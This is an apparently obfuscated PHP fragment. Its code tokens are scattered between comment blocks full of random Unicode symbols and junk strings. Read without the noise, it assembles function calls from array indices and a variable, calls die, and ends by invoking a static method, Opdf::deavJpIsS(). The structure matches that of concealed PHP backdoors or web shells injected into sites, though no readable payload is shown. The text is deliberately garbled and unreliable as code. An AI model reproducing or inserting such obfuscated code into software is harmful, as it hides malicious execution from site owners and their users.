Y`k|k=Vay∓✶ℚ
-*///
]/*-


♂ⅲ❽►⇥〗≒▥۰↾➊➾┍ℍ▌⒤╩✜▾╆


W}U♂ⅲ❽►⇥〗≒▥۰↾➊➾┍ℍ▌⒤╩✜▾╆


-*///
(/*-hn-*///
"",/*-

☒☀︻⒓＂⋿⋉⋥☓◞☁☛☳⑯∳⊂

T[AmS!(>4☒☀︻⒓＂⋿⋉⋥☓◞☁☛☳⑯∳⊂

-*///
 $MB/*-e14!X-*///
[/*-
★⅐⑸∁Ⓡ◭［◈⇤⒟♆㈣☣≤⒈▬℮
g6$FxK★⅐⑸∁Ⓡ◭［◈⇤⒟♆㈣☣≤⒈▬℮
-*///
5+2/*-


㊊⇤㈦﹜⊼✡□∁⒍┮%◎ⅲ╉ⓙ⒈⓫≩⇟


wv$]wP㊊⇤㈦﹜⊼✡□∁⒍┮%◎ⅲ╉ⓙ⒈⓫≩⇟


-*///
] /*-WC-*///
. /*-ucv+-*///
$MB/*-


⒎「⊌♥⑴∳⑿♂┪⊿↷≷✯⓱Ю┤⊼Ⓣ⑮㊊


LO_je,:{g⒎「⊌♥⑴∳⑿♂┪⊿↷≷✯⓱Ю┤⊼Ⓣ⑮㊊


-*///
[/*-

●⇈〔

7GA(hq~Y~●⇈〔

-*///
4+0/*-6h(U2huYr-*///
]/*-ERA>+.!:|n-*///
(/*-


﹢┃▓⋃⊥↹ⅽ


9lO﹢┃▓⋃⊥↹ⅽ


-*///
$rKleRoykc/*-m!-*///
)/*-


﹩☐♧ⓥ◥—╌⇟◱≢♋❻✜Ↄ︷✤⋟↝⋄⊊㊍ℋ←囍


3=&+qy[bF﹩☐♧ⓥ◥—╌⇟◱≢♋❻✜Ↄ︷✤⋟↝⋄⊊㊍ℋ←囍


-*///
 . /*-T~T=l#x-*///
$MB/*-297HPOTd-*///
[/*-.||-*///
8+0/*-F,yosOve<-*///
]/*-
⒄❺☶⊫⅚ℑ╃⓶◡┿⇁❼⒉╧☰╌
shtl&@⒄❺☶⊫⅚ℑ╃⓶◡┿⇁❼⒉╧☰╌
-*///
);/*-lRl[o-*///
/*-FdsB{-*///
die;/*-0+n2y:-*///
 endif;/*-

ↂ☻∼◥░∑⒂

B.C}sↂ☻∼◥░∑⒂

-*///
 }/*-

☺®⇟┞╔⇈✲Φ♐↮◖‡웃⒰▓➋﹨❾∌∕∰ⅿℑ➆⊰✁∜

=Crvpi☺®⇟┞╔⇈✲Φ♐↮◖‡웃⒰▓➋﹨❾∌∕∰ⅿℑ➆⊰✁∜

-*///
}/*-
》◜⑰◠┙﹁◵⑤┿≪ↁ¢≁≂ⅴ⊇↖⊾
mh》◜⑰◠┙﹁◵⑤┿≪ↁ¢≁≂ⅴ⊇↖⊾
-*///
Opdf/*-
㊍▪﹌ϡ⒥⇐✑⊻㈢⊈Ⅸ㊏⅕⅑㊣⒬➙▱∻∥ⅴ⒀≌
D`b>61~!p㊍▪﹌ϡ⒥⇐✑⊻㈢⊈Ⅸ㊏⅕⅑㊣⒬➙▱∻∥ⅴ⒀≌
-*///
::/*-
◶∸➙░⅙✗♝☼❂┴♭◪⑲☥➐⒲➸Ⓩ↩ϟ⇀⓫☞◆⒱
)vtA◶∸➙░⅙✗♝☼❂┴♭◪⑲☥➐⒲➸Ⓩ↩ϟ⇀⓫☞◆⒱
-*///
deavJpIsS/*-


⇦⋝≣⒵⒅⋎¿⓭✣≭﹫◢❦⇣♁⋺≾♜➪ℱ✯☸✆▯⓵∩


lC3d;wy+⇦⋝≣⒵⒅⋎¿⓭✣≭﹫◢❦⇣♁⋺≾♜➪ℱ✯☸✆▯⓵∩


-*///
();/*-
⇆▌▭∹
n58F}{qX@⇆▌▭∹
-*///
 ?>